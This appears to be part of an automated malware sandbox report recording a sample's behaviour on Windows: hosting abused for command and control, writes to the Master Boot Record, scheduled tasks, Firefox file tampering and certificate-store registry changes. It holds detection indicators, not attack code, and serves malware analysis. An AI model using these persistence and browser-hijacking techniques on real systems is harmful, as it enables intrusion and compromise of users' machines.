File opened (read-only) \??\e: C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
File opened (read-only) \??\k: C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
File opened (read-only) \??\r: C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
File opened (read-only) \??\o: C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
File opened (read-only) \??\q: C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
File opened (read-only) \??\t: C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
File opened (read-only) \??\u: C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
File opened (read-only) \??\y: C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
File opened (read-only) \??\f: C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
File opened (read-only) \??\m: C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
File opened (read-only) \??\n: C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
File opened (read-only) \??\F: C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe N/A
File opened (read-only) \??\h: C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
File opened (read-only) \??\j: C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
File opened (read-only) \??\v: C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
File opened (read-only) \??\p: C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
File opened (read-only) \??\x: C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
File opened (read-only) \??\g: C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
File opened (read-only) \??\i: C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
File opened (read-only) \??\l: C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A iplogger.com N/A N/A
N/A iplogger.com N/A N/A

Writes to the Master Boot Record (MBR)

bootkit persistence
Description Indicator Process Target
File opened for modification \??\PhysicalDrive0 C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe N/A
File opened for modification \??\PhysicalDrive0 C:\Program Files (x86)\360\Total Security\safemon\PopWndLog.exe N/A
File opened for modification \??\PhysicalDrive0 C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe N/A
File opened for modification \??\PhysicalDrive0 C:\Program Files (x86)\360\Total Security\PatchUp.exe N/A
File opened for modification \??\PhysicalDrive0 C:\Users\Admin\Pictures\jfwLrbtuGmt3WgBnEjEXTdp4.exe N/A
File opened for modification \??\PhysicalDrive0 C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe N/A
File opened for modification \??\PhysicalDrive0 C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_91E41FAE8B0B67645773C1C9A8DB10E4 C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\ORjTvDm.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\ORjTvDm.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_242CEA72AD255CEF17D8B88AD3038326 C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\ORjTvDm.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\ORjTvDm.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\ORjTvDm.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\ORjTvDm.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\ORjTvDm.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\ORjTvDm.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\ORjTvDm.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\ORjTvDm.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\360WD\wdch.dat-journal C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\ORjTvDm.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\ORjTvDm.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_91E41FAE8B0B67645773C1C9A8DB10E4 C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\ORjTvDm.exe N/A
File created C:\Windows\system32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\7zSB59F.tmp\Install.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\ORjTvDm.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\ORjTvDm.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E52E4DB9468EB31D663A0754C2775A04 C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\ORjTvDm.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\360WD\wdch.dat C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\AppData\Local\Temp\7zSB59F.tmp\Install.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E52E4DB9468EB31D663A0754C2775A04 C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\ORjTvDm.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_05B056B983E25E9B4D43BC3D9283D686 C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\ORjTvDm.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_242CEA72AD255CEF17D8B88AD3038326 C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\ORjTvDm.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\ORjTvDm.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_05B056B983E25E9B4D43BC3D9283D686 C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\ORjTvDm.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\ORjTvDm.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\ORjTvDm.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files (x86)\360\Total Security\safemon\testwrite.ini C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe N/A
File created C:\Program Files (x86)\360\Total Security\deepscan\netconf.dat C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
File opened for modification C:\Program Files (x86)\360\Total Security\filemon\wcachedb.db C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
File opened for modification C:\Program Files (x86)\360\Total Security\filemon\wcachedb.db-journal C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
File created C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\ORjTvDm.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\ORjTvDm.exe N/A
File created C:\Program Files (x86)\1717037821_0\360TS_Setup.exe C:\Users\Admin\Pictures\360TS_Setup.exe N/A
File created C:\Program Files (x86)\360\Total Security\safemon\Log\PopWndTrackerLog\pop.log C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe N/A
File created C:\Program Files (x86)\360\Total Security\safemon\netconfig.dat C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe N/A
File opened for modification C:\Program Files (x86)\360\Total Security\deepscan\netconf.dat C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe N/A
File created C:\Program Files (x86)\360\Total Security\safemon\netconfig.dat C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
File opened for modification C:\Program Files (x86)\360\Total Security\safemon\routertp.ini C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
File created C:\Program Files (x86)\krdeMCnRKomDOvwVunR\yxGEQFa.xml C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\ORjTvDm.exe N/A
File opened for modification C:\Program Files (x86)\360\Total Security\safemon\filelog.db-journal C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
File created C:\Program Files (x86)\360\Total Security\filemon\wcachedb.db.flg C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
File created C:\Program Files (x86)\360\Total Security\modules\360evtmgr.tmp C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe N/A
File created C:\Program Files (x86)\JipyTrDkU\sJDXIlv.xml C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\ORjTvDm.exe N/A
File opened for modification C:\Program Files (x86)\360\Total Security\deepscan\speedmem2.hg-journal C:\Program Files (x86)\360\Total Security\PatchUp.exe N/A
File opened for modification C:\Program Files (x86)\1717037821_0\360TS_Setup.exe C:\Users\Admin\Pictures\360TS_Setup.exe N/A
File opened for modification C:\Program Files (x86)\360\Total Security\deepscan\speedmem2.hg C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe N/A
File opened for modification C:\Program Files (x86)\360\Total Security\safemon\testwrite.ini C:\Program Files (x86)\360\Total Security\safemon\PopWndLog.exe N/A
File opened for modification C:\Program Files (x86)\360\Total Security\SoftMgr\SoftMgr.db C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
File created C:\Program Files (x86)\360\Total Security\modules\360evtmgrpb.dat C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe N/A
File created C:\Program Files (x86)\tegRANPZONsU2\EfeJCiL.xml C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\ORjTvDm.exe N/A
File opened for modification C:\Program Files (x86)\360\Total Security\deepscan\speedmem2.hg C:\Program Files (x86)\360\Total Security\PatchUp.exe N/A
File opened for modification C:\Program Files (x86)\360\Total Security\deepscan\speedmem2.hg C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
File opened for modification C:\Program Files (x86)\360\Total Security\SoftMgr\SoftMgr.db-journal C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\ORjTvDm.exe N/A
File created C:\Program Files (x86)\nFLFFjqrQPUn\kBxrCDq.dll C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\ORjTvDm.exe N/A
File opened for modification C:\Program Files (x86)\360\Total Security\deepscan\speedmem2.hg-journal C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\ORjTvDm.exe N/A
File created C:\Program Files (x86)\YLgKyOFzWxOqC\iwJsGcj.dll C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\ORjTvDm.exe N/A
File opened for modification C:\Program Files (x86)\360\Total Security\deepscan\netconf.dat C:\Program Files (x86)\360\Total Security\PatchUp.exe N/A
File created C:\Program Files (x86)\360\Total Security\leakrepair.dat C:\Program Files (x86)\360\Total Security\PatchUp.exe N/A
File opened for modification C:\Program Files (x86)\360\Total Security\deepscan\speedmem2.hg-journal C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe N/A
File opened for modification C:\Program Files (x86)\360\Total Security\netmon\360netmon.ini C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe N/A
File created C:\Program Files (x86)\JipyTrDkU\boZYqC.dll C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\ORjTvDm.exe N/A
File created C:\Program Files (x86)\tegRANPZONsU2\jbsoPZGYNqnCa.dll C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\ORjTvDm.exe N/A
File created C:\Program Files (x86)\krdeMCnRKomDOvwVunR\EgMaDPs.dll C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\ORjTvDm.exe N/A
File opened for modification C:\Program Files (x86)\360\Total Security\safemon\routertp.ini C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe N/A
File opened for modification C:\Program Files (x86)\360\Total Security\safemon\filelog.db C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\ORjTvDm.exe N/A
File created C:\Program Files (x86)\YLgKyOFzWxOqC\iXGtiDm.xml C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\ORjTvDm.exe N/A
File opened for modification C:\Program Files (x86)\360\Total Security\leakrepair.dat C:\Program Files (x86)\360\Total Security\PatchUp.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\ELAMBKUP C:\Program Files (x86)\360\Total Security\SoftMgr\EaInstHelper64.exe N/A
File created C:\Windows\ELAMBKUP\360elam64.sys C:\Program Files (x86)\360\Total Security\SoftMgr\EaInstHelper64.exe N/A
File created C:\Windows\Tasks\bqGGCwwWIommTRgeuN.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\WKALCIrwIEiqhKBsn.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\jiLwFdOzPPQiWLm.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\QdCYtDviHOrgqJLgZ.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\axplont.job C:\Users\Admin\AppData\Local\Temp\cb560c505ccc4c84a4289a5101821494603febad6b1b665ae74fe9d41fee35dc.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files (x86)\1717037821_0\360TS_Setup.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files (x86)\1717037821_0\360TS_Setup.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Windows\SysWOW64\rundll32.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\AppData\Local\Temp\7zSB59F.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Users\Admin\AppData\Local\Temp\7zSB59F.tmp\Install.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\ORjTvDm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\ORjTvDm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\ORjTvDm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\TelemetrySalt = "5" C:\Users\Admin\AppData\Local\Temp\7zSB59F.tmp\Install.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
